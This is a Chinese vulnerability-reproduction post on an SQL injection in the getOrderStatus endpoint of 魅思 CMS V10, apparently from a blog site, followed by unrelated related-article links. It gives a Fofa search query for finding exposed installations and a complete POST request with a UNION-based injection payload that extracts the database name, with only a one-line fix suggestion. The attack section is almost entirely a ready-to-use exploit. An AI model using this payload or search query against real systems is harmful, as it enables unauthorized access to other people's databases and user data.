魅思CMS getOrderStatus SQL注入漏洞复现

0x01 漏洞描述:

魅思是一款集成了视频管理、用户管理、手机端应用封装等功能的综合性视频管理系统。该系统不仅以其强大的视频管理功能、灵活的用户管理机制、便捷的手机端应用封装功能以及高安全性和现代化的界面设计,成为了市场上备受关注的视频管理系统之一。无论是对于专业的视频内容创作者还是对于需要视频管理功能的企业和个人用户来说,都是一个值得考虑的选择。

在位于 /controller/Api.php 控制器中的getOrderStatus 方法传入后直接拼接了 orderSn 变量到 where 查询中,导致漏洞产生。

0x02 影响版本:

魅思 V10

0x03 搜索语句:

Fofa:app="魅思-视频管理系统"

0x04 漏洞复现:

POST /api/getOrderStatus HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

orderSn=') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(IFNULL(CAST(database() AS NCHAR),0x20)),NULL,NULL,NULL,NULL,NULL-- -

0x05 修复建议:

使用预编译语句并对键入的特殊字符进行编码。

相关推荐
群联云防护小杜33 分钟前
如何给负载均衡平台做好安全防御
运维·服务器·网络·网络协议·安全·负载均衡
ihengshuai33 分钟前
HTTP协议及安全防范
网络协议·安全·http
黑客Jack2 小时前
防御 XSS 的七条原则
安全·web安全·xss
东方隐侠安全团队-千里2 小时前
网安瞭望台第17期:Rockstar 2FA 故障催生 FlowerStorm 钓鱼即服务扩张现象剖析
网络·chrome·web安全
云云3212 小时前
怎么通过亚矩阵云手机实现营销?
大数据·服务器·安全·智能手机·矩阵
神一样的老师3 小时前
面向高精度网络的时间同步安全管理架构
网络·安全·架构
Mitch3114 小时前
【漏洞复现】CVE-2021-45788 SQL Injection
sql·web安全·docker·prometheus·metersphere
网络安全King4 小时前
网络安全 - SQL Injection
sql·web安全·php
云云3214 小时前
云手机方案全解析
大数据·服务器·安全·智能手机·矩阵
云云3215 小时前
云手机能用来干什么?云手机在跨境电商领域的用途
服务器·线性代数·安全·智能手机·矩阵